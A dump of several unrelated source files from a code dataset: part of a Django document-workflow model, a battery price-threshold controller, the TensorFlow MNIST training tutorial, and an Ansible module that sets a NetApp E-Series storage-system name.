objects = models.Manager()
valid = ValidWorkflowInstanceManager()
class Meta:
ordering = ('workflow',)
unique_together = ('document', 'workflow')
verbose_name = _('Workflow instance')
verbose_name_plural = _('Workflow instances')
def __str__(self):
return force_text(s=getattr(self, 'workflow', 'WI'))
def do_transition(
self, transition, comment=None, extra_data=None, user=None
):
try:
if transition in self.get_transition_choices(_user=user).all():
if extra_data:
context = self.loads()
context.update(extra_data)
self.dumps(context=context)
return self.log_entries.create(
comment=comment or '',
extra_data=json.dumps(obj=extra_data or {}),
transition=transition, user=user
)
except AttributeError:
# No initial state has been set for this workflow.
if settings.DEBUG:
raise
def dumps(self, context):
"""
Serialize the context data.
"""
self.context = json.dumps(obj=context)
self.save()
def get_absolute_url(self):
return reverse(
viewname='document_states:workflow_instance_detail', kwargs={
'workflow_instance_id': self.pk
}
)
def get_context(self):
# Keep the document instance in the workflow instance fresh when
# there are cascade state actions, where a second state action is
# triggered by the events generated by a first state action.
self.document.refresh_from_db()
context = {
'document': self.document, 'workflow': self.workflow,
'workflow_instance': self
}
context['workflow_instance_context'] = self.loads()
return context
def get_current_state(self):
"""
Actual State - The current state of the workflow. If there are
multiple states available, for example: registered, approved,
archived; this field will tell at the current state where the
document is right now.
"""
try:
return self.get_last_transition().destination_state
except AttributeError:
return self.workflow.get_initial_state()
def get_last_log_entry(self):
try:
return self.log_entries.order_by('datetime').last()
except AttributeError:
return None
def get_last_transition(self):
"""
Last Transition - The last transition used by the last user to put
the document in the actual state.
"""
try:
return self.get_last_log_entry().transition
except AttributeError:
return None
def get_runtime_context(self):
"""
Alias of self.load() to get just the runtime context of the instance
for ease of use in the condition template.
"""
return self.loads()
def get_transition_choices(self, _user=None):
current_state = self.get_current_state()
if current_state:
queryset = current_state.origin_transitions.all()
if _user:
queryset = AccessControlList.objects.restrict_queryset(
permission=permission_workflow_instance_transition,
queryset=queryset, user=_user
)
# Remove the transitions with a false return value.
for entry in queryset:
if not entry.evaluate_condition(workflow_instance=self):
queryset = queryset.exclude(id=entry.pk)
return queryset
else:
"""
This happens when a workflow has no initial state and a document
whose document type has this workflow is created. We return an
empty transition queryset.
"""
return WorkflowTransition.objects.none()
def loads(self):
"""
Deserialize the context data.
"""
return json.loads(s=self.context or '{}')
class WorkflowInstanceLogEntry(models.Model):
"""
Fields:
* user - The user who last transitioned the document from a state to the
Actual State.
* datetime - Date Time - The date and time when the last user transitioned
the document state to the Actual state.
"""
workflow_instance = models.ForeignKey(
on_delete=models.CASCADE, related_name='log_entries',
to=WorkflowInstance, verbose_name=_('Workflow instance')
)
datetime = models.DateTimeField(
auto_now_add=True, db_index=True, verbose_name=_('Datetime')
)
transition = models.ForeignKey(
on_delete=models.CASCADE, to='WorkflowTransition',
verbose_name=_('Transition')
)
user = models.ForeignKey(
blank=True, null=True, on_delete=models.CASCADE,
to=settings.AUTH_USER_MODEL, verbose_name=_('User')
)
comment = models.TextField(blank=True, verbose_name=_('Comment'))
extra_data = models.TextField(blank=True, verbose_name=_('Extra data'))
class Meta:
ordering = ('datetime',)
verbose_name = _('Workflow instance log entry')
verbose_name_plural = _('Workflow instance log entries')
def __str__(self):
return force_text(s=self.transition)
def clean(self):
if self.transition not in self.workflow_instance.get_transition_choices(_user=self.user):
raise ValidationError(_('Not a valid transition choice.'))
def get_extra_data(self):
result = {}
for key, value in self.loads().items():
try:
field = self.transition.fields.get(name=key)
except WorkflowTransitionField.DoesNotExist:
"""
There is a reference for a field that does not exist or
has been deleted.
"""
else:
result[field.label] = value
return result
def loads(self):
"""
Deserialize the context data.
"""
return json.loads(s=self.extra_data or '{}')
def save(self, *args, **kwargs):
result = super().save(*args, **kwargs)
context = self.workflow_instance.get_context()
context.update(
{
'entry_log': self
}
)
for action in self.transition.origin_state.exit_actions.filter(enabled=True):
context.update(
{
'action': action,
}
)
action.execute(
context=context, workflow_instance=self.workflow_instance
)
for action in self.transition.destination_state.entry_actions.filter(enabled=True):
context.update(
{
'action': action,
}
)
action.execute(
context=context, workflow_instance=self.workflow_instance
)
return result
|
the-stack_106_23375 | class LogicB(object):
def __init__(self, device_instance):
self.di = device_instance
def update_status(self):
"""
"""
if not len(self.di._hourly_prices):
# no hourly prices have been calculated
return
# update the charge on the device
self.di.update_state_of_charge()
# calculate the charge/discharge price thresholds
(price_threshold_discharge, price_threshold_charge) = self.calculate_price_thresholds()
# compare the current price to the calculated thresholds
if self.di.is_discharging() and self.di._price < price_threshold_discharge:
# stop discharging if price is below the threshold
self.di.stop_discharging()
elif not self.di.is_discharging() and self.di._price < price_threshold_discharge:
self.di.enable_discharge()
elif self.di.is_charging() and self.di._price > price_threshold_charge:
self.di.stop_charging()
def calculate_price_thresholds(self):
if not len(self.di._hourly_prices):
return
avg_24 = sum(self.di._hourly_prices) / len(self.di._hourly_prices)
min_24 = min(self.di._hourly_prices)
max_24 = max(self.di._hourly_prices)
# set the starting/ending threshold at 10% above/below the average
price_threshold_discharge = avg_24 * 1.10
price_threshold_charge = avg_24 * 0.90
if self.di._current_soc >= 0.5:
# charge at >= 50%
if price_threshold_discharge >= self.di._discharge_price_threshold:
price_threshold_discharge = self.di._discharge_price_threshold
price_threshold_charge = self.di._charge_price_threshold
else:
soc_ratio = (self.di._current_soc - 0.5) / 0.5
price_adjustment = (max_24 - price_threshold_discharge) * soc_ratio
price_threshold_discharge += price_adjustment
price_threshold_charge += price_adjustment
else:
# charge at < 50%
if price_threshold_charge <= self.di._charge_price_threshold:
price_threshold_charge = self.di._charge_price_threshold
price_threshold_discharge = self.di._discharge_price_threshold
else:
soc_ratio = self.di._current_soc / 0.5
price_adjustment = (self.di._charge_price_threshold - min_24) * soc_ratio
price_threshold_discharge += price_adjustment
price_threshold_charge += price_adjustment
return (price_threshold_discharge, price_threshold_charge)
|
the-stack_106_23376 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Trains and Evaluates the MNIST network using a feed dictionary."""
# pylint: disable=missing-docstring
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import tensorflow as tf
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.examples.tutorials.mnist import input_data
from tensorflow.examples.tutorials.mnist import mnist
# Basic model parameters as external flags.
flags = tf.app.flags
FLAGS = flags.FLAGS
flags.DEFINE_float('learning_rate', 0.01, 'Initial learning rate.')
flags.DEFINE_integer('max_steps', 2000, 'Number of steps to run trainer.')
flags.DEFINE_integer('hidden1', 128, 'Number of units in hidden layer 1.')
flags.DEFINE_integer('hidden2', 32, 'Number of units in hidden layer 2.')
flags.DEFINE_integer('batch_size', 100, 'Batch size. '
'Must divide evenly into the dataset sizes.')
flags.DEFINE_string('train_dir', 'data', 'Directory to put the training data.')
flags.DEFINE_boolean('fake_data', False, 'If true, uses fake data '
'for unit testing.')
def placeholder_inputs(batch_size):
"""Generate placeholder variables to represent the input tensors.
These placeholders are used as inputs by the rest of the model building
code and will be fed from the downloaded data in the .run() loop, below.
Args:
batch_size: The batch size will be baked into both placeholders.
Returns:
images_placeholder: Images placeholder.
labels_placeholder: Labels placeholder.
"""
# Note that the shapes of the placeholders match the shapes of the full
# image and label tensors, except the first dimension is now batch_size
# rather than the full size of the train or test data sets.
images_placeholder = tf.placeholder(tf.float32, shape=(batch_size,
mnist.IMAGE_PIXELS))
labels_placeholder = tf.placeholder(tf.int32, shape=(batch_size))
return images_placeholder, labels_placeholder
def fill_feed_dict(data_set, images_pl, labels_pl):
"""Fills the feed_dict for training the given step.
A feed_dict takes the form of:
feed_dict = {
<placeholder>: <tensor of values to be passed for placeholder>,
....
}
Args:
data_set: The set of images and labels, from input_data.read_data_sets()
images_pl: The images placeholder, from placeholder_inputs().
labels_pl: The labels placeholder, from placeholder_inputs().
Returns:
feed_dict: The feed dictionary mapping from placeholders to values.
"""
# Create the feed_dict for the placeholders filled with the next
# `batch size ` examples.
images_feed, labels_feed = data_set.next_batch(FLAGS.batch_size,
FLAGS.fake_data)
feed_dict = {
images_pl: images_feed,
labels_pl: labels_feed,
}
return feed_dict
def do_eval(sess,
eval_correct,
images_placeholder,
labels_placeholder,
data_set):
"""Runs one evaluation against the full epoch of data.
Args:
sess: The session in which the model has been trained.
eval_correct: The Tensor that returns the number of correct predictions.
images_placeholder: The images placeholder.
labels_placeholder: The labels placeholder.
data_set: The set of images and labels to evaluate, from
input_data.read_data_sets().
"""
# And run one epoch of eval.
true_count = 0 # Counts the number of correct predictions.
steps_per_epoch = data_set.num_examples // FLAGS.batch_size
num_examples = steps_per_epoch * FLAGS.batch_size
for step in xrange(steps_per_epoch):
feed_dict = fill_feed_dict(data_set,
images_placeholder,
labels_placeholder)
true_count += sess.run(eval_correct, feed_dict=feed_dict)
precision = true_count / num_examples
print(' Num examples: %d Num correct: %d Precision @ 1: %0.04f' %
(num_examples, true_count, precision))
def run_training():
"""Train MNIST for a number of steps."""
# Get the sets of images and labels for training, validation, and
# test on MNIST.
data_sets = input_data.read_data_sets(FLAGS.train_dir, FLAGS.fake_data)
# Tell TensorFlow that the model will be built into the default Graph.
with tf.Graph().as_default():
# Generate placeholders for the images and labels.
images_placeholder, labels_placeholder = placeholder_inputs(
FLAGS.batch_size)
# Build a Graph that computes predictions from the inference model.
logits = mnist.inference(images_placeholder,
FLAGS.hidden1,
FLAGS.hidden2)
# Add to the Graph the Ops for loss calculation.
loss = mnist.loss(logits, labels_placeholder)
# Add to the Graph the Ops that calculate and apply gradients.
train_op = mnist.training(loss, FLAGS.learning_rate)
# Add the Op to compare the logits to the labels during evaluation.
eval_correct = mnist.evaluation(logits, labels_placeholder)
# Build the summary operation based on the TF collection of Summaries.
summary_op = tf.merge_all_summaries()
# Create a saver for writing training checkpoints.
saver = tf.train.Saver()
# Create a session for running Ops on the Graph.
sess = tf.Session()
# Run the Op to initialize the variables.
init = tf.initialize_all_variables()
sess.run(init)
# Instantiate a SummaryWriter to output summaries and the Graph.
summary_writer = tf.train.SummaryWriter(FLAGS.train_dir, sess.graph)
# And then after everything is built, start the training loop.
for step in xrange(FLAGS.max_steps):
start_time = time.time()
# Fill a feed dictionary with the actual set of images and labels
# for this particular training step.
feed_dict = fill_feed_dict(data_sets.train,
images_placeholder,
labels_placeholder)
# Run one step of the model. The return values are the activations
# from the `train_op` (which is discarded) and the `loss` Op. To
# inspect the values of your Ops or variables, you may include them
# in the list passed to sess.run() and the value tensors will be
# returned in the tuple from the call.
_, loss_value = sess.run([train_op, loss],
feed_dict=feed_dict)
duration = time.time() - start_time
# Write the summaries and print an overview fairly often.
if step % 100 == 0:
# Print status to stdout.
print('Step %d: loss = %.2f (%.3f sec)' % (step, loss_value, duration))
# Update the events file.
summary_str = sess.run(summary_op, feed_dict=feed_dict)
summary_writer.add_summary(summary_str, step)
summary_writer.flush()
# Save a checkpoint and evaluate the model periodically.
if (step + 1) % 1000 == 0 or (step + 1) == FLAGS.max_steps:
saver.save(sess, FLAGS.train_dir, global_step=step)
# Evaluate against the training set.
print('Training Data Eval:')
do_eval(sess,
eval_correct,
images_placeholder,
labels_placeholder,
data_sets.train)
# Evaluate against the validation set.
print('Validation Data Eval:')
do_eval(sess,
eval_correct,
images_placeholder,
labels_placeholder,
data_sets.validation)
# Evaluate against the test set.
print('Test Data Eval:')
do_eval(sess,
eval_correct,
images_placeholder,
labels_placeholder,
data_sets.test)
def main(_):
run_training()
if __name__ == '__main__':
tf.app.run()
|
the-stack_106_23379 | #!/usr/bin/python
# (c) 2018, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: netapp_e_global
short_description: NetApp E-Series manage global settings configuration
description:
- Allow the user to configure several of the global settings associated with an E-Series storage-system
version_added: '2.7'
author: Michael Price (@lmprice)
extends_documentation_fragment:
- netapp.eseries
options:
name:
description:
- Set the name of the E-Series storage-system
- This label/name doesn't have to be unique.
- May be up to 30 characters in length.
aliases:
- label
log_path:
description:
- A local path to a file to be used for debug logging
required: no
notes:
- Check mode is supported.
- This module requires Web Services API v1.3 or newer.
"""
EXAMPLES = """
- name: Set the storage-system name
netapp_e_global:
name: myArrayName
api_url: "10.1.1.1:8443"
api_username: "admin"
api_password: "myPass"
"""
RETURN = """
msg:
description: Success message
returned: on success
type: str
sample: The settings have been updated.
name:
description:
- The current name/label of the storage-system.
returned: on success
sample: myArrayName
type: str
"""
import json
import logging
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.netapp import request, eseries_host_argument_spec
from ansible.module_utils._text import to_native
HEADERS = {
"Content-Type": "application/json",
"Accept": "application/json",
}
class GlobalSettings(object):
def __init__(self):
argument_spec = eseries_host_argument_spec()
argument_spec.update(dict(
name=dict(type='str', required=False, aliases=['label']),
log_path=dict(type='str', required=False),
))
self.module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True, )
args = self.module.params
self.name = args['name']
self.ssid = args['ssid']
self.url = args['api_url']
self.creds = dict(url_password=args['api_password'],
validate_certs=args['validate_certs'],
url_username=args['api_username'], )
self.check_mode = self.module.check_mode
log_path = args['log_path']
# logging setup
self._logger = logging.getLogger(self.__class__.__name__)
if log_path:
logging.basicConfig(
level=logging.DEBUG, filename=log_path, filemode='w',
format='%(relativeCreated)dms %(levelname)s %(module)s.%(funcName)s:%(lineno)d\n %(message)s')
if not self.url.endswith('/'):
self.url += '/'
if self.name and len(self.name) > 30:
self.module.fail_json(msg="The provided name is invalid, it must be < 30 characters in length.")
def get_name(self):
try:
(rc, result) = request(self.url + 'storage-systems/%s' % self.ssid, headers=HEADERS, **self.creds)
if result['status'] in ['offline', 'neverContacted']:
self.module.fail_json(msg="This storage-system is offline! Array Id [%s]." % (self.ssid))
return result['name']
except Exception as err:
self.module.fail_json(msg="Connection failure! Array Id [%s]. Error [%s]." % (self.ssid, to_native(err)))
def update_name(self):
name = self.get_name()
update = False
if self.name != name:
update = True
body = dict(name=self.name)
if update and not self.check_mode:
try:
(rc, result) = request(self.url + 'storage-systems/%s/configuration' % self.ssid, method='POST',
data=json.dumps(body), headers=HEADERS, **self.creds)
self._logger.info("Set name to %s.", result['name'])
# This is going to catch cases like a connection failure
except Exception as err:
self.module.fail_json(
msg="We failed to set the storage-system name! Array Id [%s]. Error [%s]."
% (self.ssid, to_native(err)))
return update
def update(self):
update = self.update_name()
name = self.get_name()
self.module.exit_json(msg="The requested settings have been updated.", changed=update, name=name)
def __call__(self, *args, **kwargs):
self.update()
def main():
settings = GlobalSettings()
settings()
if __name__ == '__main__':
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.